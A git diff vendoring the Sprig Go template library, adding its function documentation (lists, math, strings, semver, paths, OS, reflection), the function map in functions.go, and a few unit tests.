+ - [OS Functions](os.md): `env`, `expandenv`
+ - [Version Comparison Functions](semver.md): `semver`, `semverCompare`
+ - [Reflection](reflection.md): `typeOf`, `kindIs`, `typeIsLike`, etc.
+ - [Cryptographic and Security Functions](crypto.md): `derivePassword`, `sha256sum`, `genPrivateKey`
+
diff --git a/vendor/github.com/Masterminds/sprig/docs/integer_slice.md b/vendor/github.com/Masterminds/sprig/docs/integer_slice.md
new file mode 100644
index 0000000000..8929d30363
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/integer_slice.md
@@ -0,0 +1,25 @@
+# Integer Slice Functions
+
+## until
+
+The `until` function builds a range of integers.
+
+```
+until 5
+```
+
+The above generates the list `[0, 1, 2, 3, 4]`.
+
+This is useful for looping with `range $i, $e := until 5`.
+
+## untilStep
+
+Like `until`, `untilStep` generates a list of counting integers. But it allows
+you to define a start, stop, and step:
+
+```
+untilStep 3 6 2
+```
+
+The above will produce `[3 5]` by starting with 3, and adding 2 until it is equal
+or greater than 6. This is similar to Python's `range` function.
diff --git a/vendor/github.com/Masterminds/sprig/docs/lists.md b/vendor/github.com/Masterminds/sprig/docs/lists.md
new file mode 100644
index 0000000000..22441cec54
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/lists.md
@@ -0,0 +1,111 @@
+# Lists and List Functions
+
+Sprig provides a simple `list` type that can contain arbitrary sequential lists
+of data. This is similar to arrays or slices, but lists are designed to be used
+as immutable data types.
+
+Create a list of integers:
+
+```
+$myList := list 1 2 3 4 5
+```
+
+The above creates a list of `[1 2 3 4 5]`.
+
+## first
+
+To get the head item on a list, use `first`.
+
+`first $myList` returns `1`
+
+## rest
+
+To get the tail of the list (everything but the first item), use `rest`.
+
+`rest $myList` returns `[2 3 4 5]`
+
+## last
+
+To get the last item on a list, use `last`:
+
+`last $myList` returns `5`. This is roughly analogous to reversing a list and
+then calling `first`.
+
+## initial
+
+This compliments `last` by returning all _but_ the last element.
+`initial $myList` returns `[1 2 3 4]`.
+
+## append
+
+Append a new item to an existing list, creating a new list.
+
+```
+$new = append $myList 6
+```
+
+The above would set `$new` to `[1 2 3 4 5 6]`. `$myList` would remain unaltered.
+
+## prepend
+
+Push an alement onto the front of a list, creating a new list.
+
+```
+prepend $myList 0
+```
+
+The above would produce `[0 1 2 3 4 5]`. `$myList` would remain unaltered.
+
+## reverse
+
+Produce a new list with the reversed elements of the given list.
+
+```
+reverse $myList
+```
+
+The above would generate the list `[5 4 3 2 1]`.
+
+## uniq
+
+Generate a list with all of the duplicates removed.
+
+```
+list 1 1 1 2 | uniq
+```
+
+The above would produce `[1 2]`
+
+## without
+
+The `without` function filters items out of a list.
+
+```
+without $myList 3
+```
+
+The above would produce `[1 2 4 5]`
+
+Without can take more than one filter:
+
+```
+without $myList 1 3 5
+```
+
+That would produce `[2 4]`
+
+## has
+
+Test to see if a list has a particular element.
+
+```
+has $myList 4
+```
+
+The above would return `true`, while `has $myList "hello"` would return false.
+
+## A Note on List Internals
+
+A list is implemented in Go as a `[]interface{}`. For Go developers embedding
+Sprig, you may pass `[]interface{}` items into your template context and be
+able to use all of the `list` functions on those items.
diff --git a/vendor/github.com/Masterminds/sprig/docs/math.md b/vendor/github.com/Masterminds/sprig/docs/math.md
new file mode 100644
index 0000000000..95f2f1e599
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/math.md
@@ -0,0 +1,63 @@
+# Math Functions
+
+All math functions operate on `int64` values unless specified otherwise.
+
+(In the future, these will be extended to handle floats as well)
+
+## add
+
+Sum numbers with `add`
+
+## add1
+
+To increment by 1, use `add1`
+
+## sub
+
+To subtract, use `sub`
+
+## div
+
+Perform integer division with `div`
+
+## mod
+
+Modulo with `mod`
+
+## mul
+
+Multiply with `mul`
+
+## max
+
+Return the largest of a series of integers:
+
+This will return `3`:
+
+```
+max 1 2 3
+```
+
+## min
+
+Return the smallest of a series of integers.
+
+`min 1 2 3` will return `1`.
+
+## floor
+
+Returns the greatest float value less than or equal to input value
+
+`floor 123.9999` will return `123.0`
+
+## ceil
+
+Returns the greatest float value greater than or equal to input value
+
+`ceil 123.001` will return `124.0`
+
+## round
+
+Returns a float value with the remainder rounded to the given number to digits after the decimal point.
+
+`round 123.555555` will return `123.556`
\ No newline at end of file
diff --git a/vendor/github.com/Masterminds/sprig/docs/os.md b/vendor/github.com/Masterminds/sprig/docs/os.md
new file mode 100644
index 0000000000..e4c197ad04
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/os.md
@@ -0,0 +1,24 @@
+# OS Functions
+
+_WARNING:_ These functions can lead to information leakage if not used
+appropriately.
+
+_WARNING:_ Some notable implementations of Sprig (such as
+[Kubernetes Helm](http://helm.sh) _do not provide these functions for security
+reasons_.
+
+## env
+
+The `env` function reads an environment variable:
+
+```
+env "HOME"
+```
+
+## expandenv
+
+To substitute environment variables in a string, use `expandenv`:
+
+```
+expandenv "Your path is set to $PATH"
+```
diff --git a/vendor/github.com/Masterminds/sprig/docs/paths.md b/vendor/github.com/Masterminds/sprig/docs/paths.md
new file mode 100644
index 0000000000..87ec6d45a2
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/paths.md
@@ -0,0 +1,43 @@
+# File Path Functions
+
+While Sprig does not grant access to the filesystem, it does provide functions
+for working with strings that follow file path conventions.
+
+# base
+
+Return the last element of a path.
+
+```
+base "foo/bar/baz"
+```
+
+The above prints "baz"
+
+# dir
+
+Return the directory, stripping the last part of the path. So `dir "foo/bar/baz"`
+returns `foo/bar`
+
+# clean
+
+Clean up a path.
+
+```
+clean "foo/bar/../baz"
+```
+
+The above resolves the `..` and returns `foo/baz`
+
+# ext
+
+Return the file extension.
+
+```
+ext "foo.bar"
+```
+
+The above returns `.bar`.
+
+# isAbs
+
+To check whether a file path is absolute, use `isAbs`.
diff --git a/vendor/github.com/Masterminds/sprig/docs/reflection.md b/vendor/github.com/Masterminds/sprig/docs/reflection.md
new file mode 100644
index 0000000000..597871f3c5
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/reflection.md
@@ -0,0 +1,38 @@
+# Reflection Functions
+
+Sprig provides rudimentary reflection tools. These help advanced template
+developers understand the underlying Go type information for a particular value.
+
+Go has several primitive _kinds_, like `string`, `slice`, `int64`, and `bool`.
+
+Go has an open _type_ system that allows developers to create their own types.
+
+Sprig provides a set of functions for each.
+
+## Kind Functions
+
+There are two Kind functions: `kindOf` returns the kind of an object.
+
+```
+kindOf "hello"
+```
+
+The above would return `string`. For simple tests (like in `if` blocks), the
+`isKind` function will let you verify that a value is a particular kind:
+
+```
+kindIs "int" 123
+```
+
+The above will return `true`
+
+## Type Functions
+
+Types are slightly harder to work with, so there are three different functions:
+
+- `typeOf` returns the underlying type of a value: `typeOf $foo`
+- `typeIs` is like `kindIs`, but for types: `typeIs "*io.Buffer" $myVal`
+- `typeIsLike` works as `kindIs`, except that it also dereferences pointers.
+
+**Note:** None of these can test whether or not something implements a given
+interface, since doing so would require compiling the interface in ahead of time.
diff --git a/vendor/github.com/Masterminds/sprig/docs/semver.md b/vendor/github.com/Masterminds/sprig/docs/semver.md
new file mode 100644
index 0000000000..e0cbfeb7ae
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/semver.md
@@ -0,0 +1,124 @@
+# Semantic Version Functions
+
+Some version schemes are easily parseable and comparable. Sprig provides functions
+for working with [SemVer 2](http://semver.org) versions.
+
+## semver
+
+The `semver` function parses a string into a Semantic Version:
+
+```
+$version := semver "1.2.3-alpha.1+123"
+```
+
+_If the parser fails, it will cause template execution to halt with an error._
+
+At this point, `$version` is a pointer to a `Version` object with the following
+properties:
+
+- `$version.Major`: The major number (`1` above)
+- `$version.Minor`: The minor number (`2` above)
+- `$version.Patch`: The patch number (`3` above)
+- `$version.Prerelease`: The prerelease (`alpha.1` above)
+- `$version.Metadata`: The build metadata (`123` above)
+- `$version.Original`: The original version as a string
+
+Additionally, you can compare a `Version` to another `version` using the `Compare`
+function:
+
+```
+semver "1.4.3" | (semver "1.2.3").Compare
+```
+
+The above will return `-1`.
+
+The return values are:
+
+- `-1` if the given semver is greater than the semver whose `Compare` method was called
+- `1` if the version who's `Compare` function was called is greater.
+- `0` if they are the same version
+
+(Note that in SemVer, the `Metadata` field is not compared during version
+comparison operations.)
+
+
+## semverCompare
+
+A more robust comparison function is provided as `semverCompare`. This version
+supports version ranges:
+
+- `semverCompare "1.2.3" "1.2.3"` checks for an exact match
+- `semverCompare "^1.2.0" "1.2.3"` checks that the major and minor versions match, and that the patch
+ number of the second version is _greater than or equal to_ the first parameter.
+
+The SemVer functions use the [Masterminds semver library](https://github.com/Masterminds/semver),
+from the creators of Sprig.
+
+
+## Basic Comparisons
+
+There are two elements to the comparisons. First, a comparison string is a list
+of comma separated and comparisons. These are then separated by || separated or
+comparisons. For example, `">= 1.2, < 3.0.0 || >= 4.2.3"` is looking for a
+comparison that's greater than or equal to 1.2 and less than 3.0.0 or is
+greater than or equal to 4.2.3.
+
+The basic comparisons are:
+
+* `=`: equal (aliased to no operator)
+* `!=`: not equal
+* `>`: greater than
+* `<`: less than
+* `>=`: greater than or equal to
+* `<=`: less than or equal to
+
+_Note, according to the Semantic Version specification pre-releases may not be
+API compliant with their release counterpart. It says,_
+
+> _A pre-release version indicates that the version is unstable and might not satisfy the intended compatibility requirements as denoted by its associated normal version._
+
+_SemVer comparisons without a pre-release value will skip pre-release versions.
+For example, `>1.2.3` will skip pre-releases when looking at a list of values
+while `>1.2.3-alpha.1` will evaluate pre-releases._
+
+## Hyphen Range Comparisons
+
+There are multiple methods to handle ranges and the first is hyphens ranges.
+These look like:
+
+* `1.2 - 1.4.5` which is equivalent to `>= 1.2, <= 1.4.5`
+* `2.3.4 - 4.5` which is equivalent to `>= 2.3.4, <= 4.5`
+
+## Wildcards In Comparisons
+
+The `x`, `X`, and `*` characters can be used as a wildcard character. This works
+for all comparison operators. When used on the `=` operator it falls
+back to the pack level comparison (see tilde below). For example,
+
+* `1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `>= 1.2.x` is equivalent to `>= 1.2.0`
+* `<= 2.x` is equivalent to `<= 3`
+* `*` is equivalent to `>= 0.0.0`
+
+## Tilde Range Comparisons (Patch)
+
+The tilde (`~`) comparison operator is for patch level ranges when a minor
+version is specified and major level changes when the minor number is missing.
+For example,
+
+* `~1.2.3` is equivalent to `>= 1.2.3, < 1.3.0`
+* `~1` is equivalent to `>= 1, < 2`
+* `~2.3` is equivalent to `>= 2.3, < 2.4`
+* `~1.2.x` is equivalent to `>= 1.2.0, < 1.3.0`
+* `~1.x` is equivalent to `>= 1, < 2`
+
+## Caret Range Comparisons (Major)
+
+The caret (`^`) comparison operator is for major level changes. This is useful
+when comparisons of API versions as a major change is API breaking. For example,
+
+* `^1.2.3` is equivalent to `>= 1.2.3, < 2.0.0`
+* `^1.2.x` is equivalent to `>= 1.2.0, < 2.0.0`
+* `^2.3` is equivalent to `>= 2.3, < 3`
+* `^2.x` is equivalent to `>= 2.0.0, < 3`
+
diff --git a/vendor/github.com/Masterminds/sprig/docs/string_slice.md b/vendor/github.com/Masterminds/sprig/docs/string_slice.md
new file mode 100644
index 0000000000..25643ec1c1
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/string_slice.md
@@ -0,0 +1,55 @@
+# String Slice Functions
+
+These function operate on or generate slices of strings. In Go, a slice is a
+growable array. In Sprig, it's a special case of a `list`.
+
+## join
+
+Join a list of strings into a single string, with the given separator.
+
+```
+list "hello" "world" | join "_"
+```
+
+The above will produce `hello_world`
+
+`join` will try to convert non-strings to a string value:
+
+```
+list 1 2 3 | join "+"
+```
+
+The above will produce `1+2+3`
+
+## splitList and split
+
+Split a string into a list of strings:
+
+```
+splitList "$" "foo$bar$baz"
+```
+
+The above will return `[foo bar baz]`
+
+The older `split` function splits a string into a `dict`. It is designed to make
+it easy to use template dot notation for accessing members:
+
+```
+$a := split "$" "foo$bar$baz"
+```
+
+The above produces a map with index keys. `{_0: foo, _1: bar, _2: baz}`
+
+```
+$a._0
+```
+
+The above produces `foo`
+
+## sortAlpha
+
+The `sortAlpha` function sorts a list of strings into alphabetical (lexicographical)
+order.
+
+It does _not_ sort in place, but returns a sorted copy of the list, in keeping
+with the immutability of lists.
diff --git a/vendor/github.com/Masterminds/sprig/docs/strings.md b/vendor/github.com/Masterminds/sprig/docs/strings.md
new file mode 100644
index 0000000000..8deb4cf6b0
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/strings.md
@@ -0,0 +1,397 @@
+# String Functions
+
+Sprig has a number of string manipulation functions.
+
+## trim
+
+The `trim` function removes space from either side of a string:
+
+```
+trim " hello "
+```
+
+The above produces `hello`
+
+## trimAll
+
+Remove given characters from the front or back of a string:
+
+```
+trimAll "$" "$5.00"
+```
+
+The above returns `5.00` (as a string).
+
+## trimSuffix
+
+Trim just the suffix from a string:
+
+```
+trimSuffix "-" "hello-"
+```
+
+The above returns `hello`
+
+## upper
+
+Convert the entire string to uppercase:
+
+```
+upper "hello"
+```
+
+The above returns `HELLO`
+
+## lower
+
+Convert the entire string to lowercase:
+
+```
+lower "HELLO"
+```
+
+The above returns `hello`
+
+## title
+
+Convert to title case:
+
+```
+title "hello world"
+```
+
+The above returns `Hello World`
+
+## untitle
+
+Remove title casing. `untitle "Hello World"` produces `hello world`.
+
+## repeat
+
+Repeat a string multiple times:
+
+```
+repeat 3 "hello"
+```
+
+The above returns `hellohellohello`
+
+## substr
+
+Get a substring from a string. It takes three parameters:
+
+- start (int)
+- length (int)
+- string (string)
+
+```
+substr 0 5 "hello world"
+```
+
+The above returns `hello`
+
+## nospace
+
+Remove all whitespace from a string.
+
+```
+nospace "hello w o r l d"
+```
+
+The above returns `helloworld`
+
+## trunc
+
+Truncate a string (and add no suffix)
+
+```
+trunc 5 "hello world"
+```
+
+The above produces `hello`.
+
+## abbrev
+
+Truncate a string with ellipses (`...`)
+
+Parameters:
+- max length
+- the string
+
+```
+abbrev 5 "hello world"
+```
+
+The above returns `he...`, since it counts the width of the ellipses against the
+maximum length.
+
+## abbrevboth
+
+Abbreviate both sides:
+
+```
+abbrevboth 5 10 "1234 5678 9123"
+```
+
+the above produces `...5678...`
+
+It takes:
+
+- left offset
+- max length
+- the string
+
+## initials
+
+Given multiple words, take the first letter of each word and combine.
+
+```
+initials "First Try"
+```
+
+The above returns `FT`
+
+## randAlphaNum, randAlpha, randNumeric, and randAscii
+
+These four functions generate random strings, but with different base character
+sets:
+
+- `randAlphaNum` uses `0-9a-zA-Z`
+- `randAlpha` uses `a-zA-Z`
+- `randNumeric` uses `0-9`
+- `randAscii` uses all printable ASCII characters
+
+Each of them takes one parameter: the integer length of the string.
+
+```
+randNumeric 3
+```
+
+The above will produce a random string with three digits.
+
+## wrap
+
+Wrap text at a given column count:
+
+```
+wrap 80 $someText
+```
+
+The above will wrap the string in `$someText` at 80 columns.
+
+## wrapWith
+
+`wrapWith` works as `wrap`, but lets you specify the string to wrap with.
+(`wrap` uses `\n`)
+
+```
+wrapWith 5 "\t" "Hello World"
+```
+
+The above produces `hello world` (where the whitespace is an ASCII tab
+character)
+
+## contains
+
+Test to see if one string is contained inside of another:
+
+```
+contains "cat" "catch"
+```
+
+The above returns `true` because `catch` contains `cat`.
+
+## hasPrefix and hasSuffix
+
+The `hasPrefix` and `hasSuffix` functions test whether a string has a given
+prefix or suffix:
+
+```
+hasPrefix "cat" "catch"
+```
+
+The above returns `true` because `catch` has the prefix `cat`.
+
+## quote and squote
+
+These functions wrap a string in double quotes (`quote`) or single quotes
+(`squote`).
+
+## cat
+
+The `cat` function concatenates multiple strings together into one, separating
+them with spaces:
+
+```
+cat "hello" "beautiful" "world"
+```
+
+The above produces `hello beautiful world`
+
+## indent
+
+The `indent` function indents every line in a given string to the specified
+indent width. This is useful when aligning multi-line strings:
+
+```
+indent 4 $lots_of_text
+```
+
+The above will indent every line of text by 4 space characters.
+
+## nindent
+
+The `nindent` function is the same as the indent function, but prepends a new
+line to the beginning of the string.
+
+```
+nindent 4 $lots_of_text
+```
+
+The above will indent every line of text by 4 space characters and add a new
+line to the beginning.
+
+## replace
+
+Perform simple string replacement.
+
+It takes three arguments:
+
+- string to replace
+- string to replace with
+- source string
+
+```
+"I Am Henry VIII" | replace " " "-"
+```
+
+The above will produce `I-Am-Henry-VIII`
+
+## plural
+
+Pluralize a string.
+
+```
+len $fish | plural "one anchovy" "many anchovies"
+```
+
+In the above, if the length of the string is 1, the first argument will be
+printed (`one anchovy`). Otherwise, the second argument will be printed
+(`many anchovies`).
+
+The arguments are:
+
+- singular string
+- plural string
+- length integer
+
+NOTE: Sprig does not currently support languages with more complex pluralization
+rules. And `0` is considered a plural because the English language treats it
+as such (`zero anchovies`). The Sprig developers are working on a solution for
+better internationalization.
+
+## snakecase
+
+Convert string from camelCase to snake_case.
+
+Introduced in 2.12.0.
+
+```
+snakecase "FirstName"
+```
+
+This above will produce `first_name`.
+
+## camelcase
+
+Convert string from snake_case to CamelCase
+
+Introduced in 2.12.0.
+
+```
+camelcase "http_server"
+```
+
+This above will produce `HttpServer`.
+
+## shuffle
+
+Shuffle a string.
+
+Introduced in 2.12.0.
+
+
+```
+shuffle "hello"
+```
+
+The above will randomize the letters in `hello`, perhaps producing `oelhl`.
+
+## regexMatch
+
+Returns true if the input string mratches the regular expression.
+
+```
+regexMatch "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}" "test@acme.com"
+```
+
+The above produces `true`
+
+## regexFindAll
+
+Returns a slice of all matches of the regular expression in the input string
+
+```
+regexFindAll "[2,4,6,8]" "123456789
+```
+
+The above produces `[2 4 6 8]`
+
+## regexFind
+
+Return the first (left most) match of the regular expression in the input string
+
+```
+regexFind "[a-zA-Z][1-9]" "abcd1234"
+```
+
+The above produces `d1`
+
+## regexReplaceAll
+
+Returns a copy of the input string, replacing matches of the Regexp with the replacement string replacement.
+Inside string replacement, $ signs are interpreted as in Expand, so for instance $1 represents the text of the first submatch
+
+```
+regexReplaceAll "a(x*)b" "-ab-axxb-" "${1}W"
+```
+
+The above produces `-W-xxW-`
+
+## regexReplaceAllLiteral
+
+Returns a copy of the input string, replacing matches of the Regexp with the replacement string replacement
+The replacement string is substituted directly, without using Expand
+
+```
+regexReplaceAllLiteral "a(x*)b" "-ab-axxb-" "${1}"
+```
+
+The above produces `-${1}-${1}-`
+
+## regexSplit
+
+Slices the input string into substrings separated by the expression and returns a slice of the substrings between those expression matches. The last parameter `n` determines the number of substrings to return, where `-1` means return all matches
+
+```
+regexSplit "z+" "pizza" -1
+```
+
+The above produces `[pi a]`
+
+## See Also...
+
+The [Conversion Functions](conversion.html) contain functions for converting
+strings. The [String Slice Functions](string_slice.html) contains functions
+for working with an array of strings.
+
diff --git a/vendor/github.com/Masterminds/sprig/docs/uuid.md b/vendor/github.com/Masterminds/sprig/docs/uuid.md
new file mode 100644
index 0000000000..1b57a330a9
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/docs/uuid.md
@@ -0,0 +1,9 @@
+# UUID Functions
+
+Sprig can generate UUID v4 universally unique IDs.
+
+```
+uuidv4
+```
+
+The above returns a new UUID of the v4 (randomly generated) type.
diff --git a/vendor/github.com/Masterminds/sprig/example_test.go b/vendor/github.com/Masterminds/sprig/example_test.go
new file mode 100644
index 0000000000..2d7696bf9e
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/example_test.go
@@ -0,0 +1,25 @@
+package sprig
+
+import (
+ "fmt"
+ "os"
+ "text/template"
+)
+
+func Example() {
+ // Set up variables and template.
+ vars := map[string]interface{}{"Name": " John Jacob Jingleheimer Schmidt "}
+ tpl := `Hello {{.Name | trim | lower}}`
+
+ // Get the Sprig function map.
+ fmap := TxtFuncMap()
+ t := template.Must(template.New("test").Funcs(fmap).Parse(tpl))
+
+ err := t.Execute(os.Stdout, vars)
+ if err != nil {
+ fmt.Printf("Error during template execution: %s", err)
+ return
+ }
+ // Output:
+ // Hello john jacob jingleheimer schmidt
+}
diff --git a/vendor/github.com/Masterminds/sprig/flow_control_test.go b/vendor/github.com/Masterminds/sprig/flow_control_test.go
new file mode 100644
index 0000000000..d4e5ebf03f
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/flow_control_test.go
@@ -0,0 +1,16 @@
+package sprig
+
+import (
+ "fmt"
+ "testing"
+
+ "github.com/stretchr/testify/assert"
+)
+
+func TestFail(t *testing.T) {
+ const msg = "This is an error!"
+ tpl := fmt.Sprintf(`{{fail "%s"}}`, msg)
+ _, err := runRaw(tpl, nil)
+ assert.Error(t, err)
+ assert.Contains(t, err.Error(), msg)
+}
diff --git a/vendor/github.com/Masterminds/sprig/functions.go b/vendor/github.com/Masterminds/sprig/functions.go
new file mode 100644
index 0000000000..f0d1bc12c1
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/functions.go
@@ -0,0 +1,281 @@
+package sprig
+
+import (
+ "errors"
+ "html/template"
+ "os"
+ "path"
+ "strconv"
+ "strings"
+ ttemplate "text/template"
+ "time"
+
+ util "github.com/aokoli/goutils"
+ "github.com/huandu/xstrings"
+)
+
+// Produce the function map.
+//
+// Use this to pass the functions into the template engine:
+//
+// tpl := template.New("foo").Funcs(sprig.FuncMap()))
+//
+func FuncMap() template.FuncMap {
+ return HtmlFuncMap()
+}
+
+// HermeticTextFuncMap returns a 'text/template'.FuncMap with only repeatable functions.
+func HermeticTxtFuncMap() ttemplate.FuncMap {
+ r := TxtFuncMap()
+ for _, name := range nonhermeticFunctions {
+ delete(r, name)
+ }
+ return r
+}
+
+// HermeticHtmlFuncMap returns an 'html/template'.Funcmap with only repeatable functions.
+func HermeticHtmlFuncMap() template.FuncMap {
+ r := HtmlFuncMap()
+ for _, name := range nonhermeticFunctions {
+ delete(r, name)
+ }
+ return r
+}
+
+// TextFuncMap returns a 'text/template'.FuncMap
+func TxtFuncMap() ttemplate.FuncMap {
+ return ttemplate.FuncMap(GenericFuncMap())
+}
+
+// HtmlFuncMap returns an 'html/template'.Funcmap
+func HtmlFuncMap() template.FuncMap {
+ return template.FuncMap(GenericFuncMap())
+}
+
+// GenericFuncMap returns a copy of the basic function map as a map[string]interface{}.
+func GenericFuncMap() map[string]interface{} {
+ gfm := make(map[string]interface{}, len(genericMap))
+ for k, v := range genericMap {
+ gfm[k] = v
+ }
+ return gfm
+}
+
+// These functions are not guaranteed to evaluate to the same result for given input, because they
+// refer to the environemnt or global state.
+var nonhermeticFunctions = []string{
+ // Date functions
+ "date",
+ "date_in_zone",
+ "date_modify",
+ "now",
+ "htmlDate",
+ "htmlDateInZone",
+ "dateInZone",
+ "dateModify",
+
+ // Strings
+ "randAlphaNum",
+ "randAlpha",
+ "randAscii",
+ "randNumeric",
+ "uuidv4",
+
+ // OS
+ "env",
+ "expandenv",
+}
+
+var genericMap = map[string]interface{}{
+ "hello": func() string { return "Hello!" },
+
+ // Date functions
+ "date": date,
+ "date_in_zone": dateInZone,
+ "date_modify": dateModify,
+ "now": func() time.Time { return time.Now() },
+ "htmlDate": htmlDate,
+ "htmlDateInZone": htmlDateInZone,
+ "dateInZone": dateInZone,
+ "dateModify": dateModify,
+ "ago": dateAgo,
+ "toDate": toDate,
+
+ // Strings
+ "abbrev": abbrev,
+ "abbrevboth": abbrevboth,
+ "trunc": trunc,
+ "trim": strings.TrimSpace,
+ "upper": strings.ToUpper,
+ "lower": strings.ToLower,
+ "title": strings.Title,
+ "untitle": untitle,
+ "substr": substring,
+ // Switch order so that "foo" | repeat 5
+ "repeat": func(count int, str string) string { return strings.Repeat(str, count) },
+ // Deprecated: Use trimAll.
+ "trimall": func(a, b string) string { return strings.Trim(b, a) },
+ // Switch order so that "$foo" | trimall "$"
+ "trimAll": func(a, b string) string { return strings.Trim(b, a) },
+ "trimSuffix": func(a, b string) string { return strings.TrimSuffix(b, a) },
+ "trimPrefix": func(a, b string) string { return strings.TrimPrefix(b, a) },
+ "nospace": util.DeleteWhiteSpace,
+ "initials": initials,
+ "randAlphaNum": randAlphaNumeric,
+ "randAlpha": randAlpha,
+ "randAscii": randAscii,
+ "randNumeric": randNumeric,
+ "swapcase": util.SwapCase,
+ "shuffle": xstrings.Shuffle,
+ "snakecase": xstrings.ToSnakeCase,
+ "camelcase": xstrings.ToCamelCase,
+ "wrap": func(l int, s string) string { return util.Wrap(s, l) },
+ "wrapWith": func(l int, sep, str string) string { return util.WrapCustom(str, l, sep, true) },
+ // Switch order so that "foobar" | contains "foo"
+ "contains": func(substr string, str string) bool { return strings.Contains(str, substr) },
+ "hasPrefix": func(substr string, str string) bool { return strings.HasPrefix(str, substr) },
+ "hasSuffix": func(substr string, str string) bool { return strings.HasSuffix(str, substr) },
+ "quote": quote,
+ "squote": squote,
+ "cat": cat,
+ "indent": indent,
+ "nindent": nindent,
+ "replace": replace,
+ "plural": plural,
+ "sha1sum": sha1sum,
+ "sha256sum": sha256sum,
+ "toString": strval,
+
+ // Wrap Atoi to stop errors.
+ "atoi": func(a string) int { i, _ := strconv.Atoi(a); return i },
+ "int64": toInt64,
+ "int": toInt,
+ "float64": toFloat64,
+
+ //"gt": func(a, b int) bool {return a > b},
+ //"gte": func(a, b int) bool {return a >= b},
+ //"lt": func(a, b int) bool {return a < b},
+ //"lte": func(a, b int) bool {return a <= b},
+
+ // split "/" foo/bar returns map[int]string{0: foo, 1: bar}
+ "split": split,
+ "splitList": func(sep, orig string) []string { return strings.Split(orig, sep) },
+ "toStrings": strslice,
+
+ "until": until,
+ "untilStep": untilStep,
+
+ // VERY basic arithmetic.
+ "add1": func(i interface{}) int64 { return toInt64(i) + 1 },
+ "add": func(i ...interface{}) int64 {
+ var a int64 = 0
+ for _, b := range i {
+ a += toInt64(b)
+ }
+ return a
+ },
+ "sub": func(a, b interface{}) int64 { return toInt64(a) - toInt64(b) },
+ "div": func(a, b interface{}) int64 { return toInt64(a) / toInt64(b) },
+ "mod": func(a, b interface{}) int64 { return toInt64(a) % toInt64(b) },
+ "mul": func(a interface{}, v ...interface{}) int64 {
+ val := toInt64(a)
+ for _, b := range v {
+ val = val * toInt64(b)
+ }
+ return val
+ },
+ "biggest": max,
+ "max": max,
+ "min": min,
+ "ceil": ceil,
+ "floor": floor,
+ "round": round,
+
+ // string slices. Note that we reverse the order b/c that's better
+ // for template processing.
+ "join": join,
+ "sortAlpha": sortAlpha,
+
+ // Defaults
+ "default": dfault,
+ "empty": empty,
+ "coalesce": coalesce,
+ "compact": compact,
+ "toJson": toJson,
+ "toPrettyJson": toPrettyJson,
+ "ternary": ternary,
+
+ // Reflection
+ "typeOf": typeOf,
+ "typeIs": typeIs,
+ "typeIsLike": typeIsLike,
+ "kindOf": kindOf,
+ "kindIs": kindIs,
+
+ // OS:
+ "env": func(s string) string { return os.Getenv(s) },
+ "expandenv": func(s string) string { return os.ExpandEnv(s) },
+
+ // File Paths:
+ "base": path.Base,
+ "dir": path.Dir,
+ "clean": path.Clean,
+ "ext": path.Ext,
+ "isAbs": path.IsAbs,
+
+ // Encoding:
+ "b64enc": base64encode,
+ "b64dec": base64decode,
+ "b32enc": base32encode,
+ "b32dec": base32decode,
+
+ // Data Structures:
+ "tuple": list, // FIXME: with the addition of append/prepend these are no longer immutable.
+ "list": list,
+ "dict": dict,
+ "set": set,
+ "unset": unset,
+ "hasKey": hasKey,
+ "pluck": pluck,
+ "keys": keys,
+ "pick": pick,
+ "omit": omit,
+ "merge": merge,
+
+ "append": push, "push": push,
+ "prepend": prepend,
+ "first": first,
+ "rest": rest,
+ "last": last,
+ "initial": initial,
+ "reverse": reverse,
+ "uniq": uniq,
+ "without": without,
+ "has": has,
+
+ // Crypto:
+ "genPrivateKey": generatePrivateKey,
+ "derivePassword": derivePassword,
+ "buildCustomCert": buildCustomCertificate,
+ "genCA": generateCertificateAuthority,
+ "genSelfSignedCert": generateSelfSignedCertificate,
+ "genSignedCert": generateSignedCertificate,
+
+ // UUIDs:
+ "uuidv4": uuidv4,
+
+ // SemVer:
+ "semver": semver,
+ "semverCompare": semverCompare,
+
+ // Flow Control:
+ "fail": func(msg string) (string, error) { return "", errors.New(msg) },
+
+ // Regex
+ "regexMatch": regexMatch,
+ "regexFindAll": regexFindAll,
+ "regexFind": regexFind,
+ "regexReplaceAll": regexReplaceAll,
+ "regexReplaceAllLiteral": regexReplaceAllLiteral,
+ "regexSplit": regexSplit,
+}
diff --git a/vendor/github.com/Masterminds/sprig/functions_test.go b/vendor/github.com/Masterminds/sprig/functions_test.go
new file mode 100644
index 0000000000..edf88a3255
--- /dev/null
+++ b/vendor/github.com/Masterminds/sprig/functions_test.go
@@ -0,0 +1,108 @@
+package sprig
+
+import (
+ "bytes"
+ "fmt"
+ "math/rand"
+ "os"
+ "testing"
+ "text/template"
+
+ "github.com/aokoli/goutils"
+ "github.com/stretchr/testify/assert"
+)
+
+func TestEnv(t *testing.T) {
+ os.Setenv("FOO", "bar")
+ tpl := `{{env "FOO"}}`
+ if err := runt(tpl, "bar"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestExpandEnv(t *testing.T) {
+ os.Setenv("FOO", "bar")
+ tpl := `{{expandenv "Hello $FOO"}}`
+ if err := runt(tpl, "Hello bar"); err != nil {
+ t.Error(err)
+ }
+}
+
+func TestBase(t *testing.T) {
+ assert.NoError(t, runt(`{{ base "foo/bar" }}`, "bar"))
+}
+
+func TestDir(t *testing.T) {
+ assert.NoError(t, runt(`{{ dir "foo/bar/baz" }}`, "foo/bar"))
+}
+
+func TestIsAbs(t *testing.T) {
+ assert.NoError(t, runt(`{{ isAbs "/foo" }}`, "true"))
+ assert.NoError(t, runt(`{{ isAbs "foo" }}`, "false"))
+}
+
